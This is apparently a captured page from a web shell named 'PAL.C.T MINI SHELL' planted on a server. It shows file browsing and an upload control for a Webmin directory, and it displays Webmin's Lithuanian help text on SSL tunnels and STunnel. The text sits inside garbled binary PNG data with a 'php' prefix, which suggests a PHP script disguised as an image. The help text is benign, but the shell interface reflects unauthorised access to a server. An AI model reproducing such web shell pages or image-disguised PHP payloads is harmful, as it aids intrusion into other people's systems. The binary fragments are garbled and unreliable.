php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.lt.auto.html

<header> Įvadas į SSL tunelius </header> SSL yra duomenų šifravimo TCP ryšyje protokolas, kai jis keliauja per tinklą. Iš pradžių ji buvo sukurta siekiant apsaugoti srautą tarp interneto naršyklių ir serverių, tačiau gali būti naudojama šifruoti bet kokio tipo duomenų srautus, kurie paprastai būtų siunčiami per TCP protokolą. <p> SSL protokolas leidžia klientams ir serveriams autentifikuoti save vienas su kitu, kad klientas galėtų būti tikras, kad tikrai prisijungia prie pagrindinio kompiuterio, kuris, jo manymu, yra. Tai atliekama naudojant sertifikatus, kuriuos išduoda kliento pripažinta sertifikatų institucija (kad juos būtų galima patikrinti) ir susieti su tam tikru pagrindiniu kompiuterio pavadinimu. Neturėdamas sertifikatų, užpuolikas galėtų nukreipti SSL ryšį į savo serverį ir užfiksuoti slaptą informaciją iš kliento, kuris mano, kad kalba su tikruoju serveriu. <p> Bet kuriuos duomenis, kurie keliauja internetu nešifruoti, gali užfiksuoti ir perskaityti užpuolikas, turintis prieigą prie vieno iš tinklų, kuriuos jis praeina. Net duomenis, vykstančius tarp kliento ir serverio sistemos LAN tinkle, galima lengvai įsiklausyti. Kai prisijungiate prie telnet, FTP ar POP3 serverių, jūsų slaptažodis yra siunčiamas tinklu ir todėl jį gali užfiksuoti užpuolikas. <p> SSL gali būti naudojamas duomenims apsaugoti tokiose situacijose, tačiau tik tuo atveju, jei jį palaiko ir klientas, ir serveris. Daugelis interneto naršyklių ir pašto klientų gali užmegzti SSL užšifruotus HTTP, POP3 ir IMAP ryšius, tačiau ne visi interneto ir POP3 serveriai gali juos priimti. Visų pirma POP3 sunku apsaugoti, nes standartinis serveris, pateikiamas su dauguma „Unix“ sistemų, nepalaiko SSL. Laimei, nors yra sprendimas - „STunnel“. <p> „STunnel“ yra paprasta programa, kuri nepašifruotą ryšį paverčia SSL užšifruotu. Paprastai jis nustatomas taip, kad būtų paleistas iš super serverio, pavyzdžiui, „inetd“ ar „xinetd“, ir tada paleistų kitą programą, pavyzdžiui, POP3 serverį, nepalaikantį SSL. Ši konstrukcija leidžia apsaugoti bet kurį įprastai naudojamą serverį nuo „inetd“, pavyzdžiui, „telnet“, NNTP ir IMAP serverius. <p> Vis dėlto ne visus serverius galima efektyviai apsaugoti šifravimu, nes nėra kliento, kuris juos naudotų SSL režimu. Pavyzdžiui, aš niekada negirdėjau apie telnet ar FTP klientą, galintį naudoti SSL, nes bendras SSH paketas jau leidžia užšifruotus nuotolinius prisijungimus ir failų perkėlimą. <p> Šis „Webmin“ modulis leidžia lengvai nustatyti super serverio paslaugas, kurios paleidžia „STunnel“, kad būtų paleista tam tikra serverio programa. Nors tai galima padaryti rankiniu būdu naudojant interneto paslaugų modulį, šis yra specialiai sukurtas „STunnel“ nustatyti ir konfigūruoti. Jis automatiškai nustato, ar įdiegėte „inetd“ ir (arba) „xinetd“, nuskaito jų konfigūracijas, kad patikrintų esamus SSL tunelius, ir prideda prie jų, kai kuriate naują tunelį. Jei abu yra įdiegti, nauji SSL tuneliai pridedami prie xinetd konfigūracijos, nes, mano manymu, jis yra pranašesnis iš dviejų. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`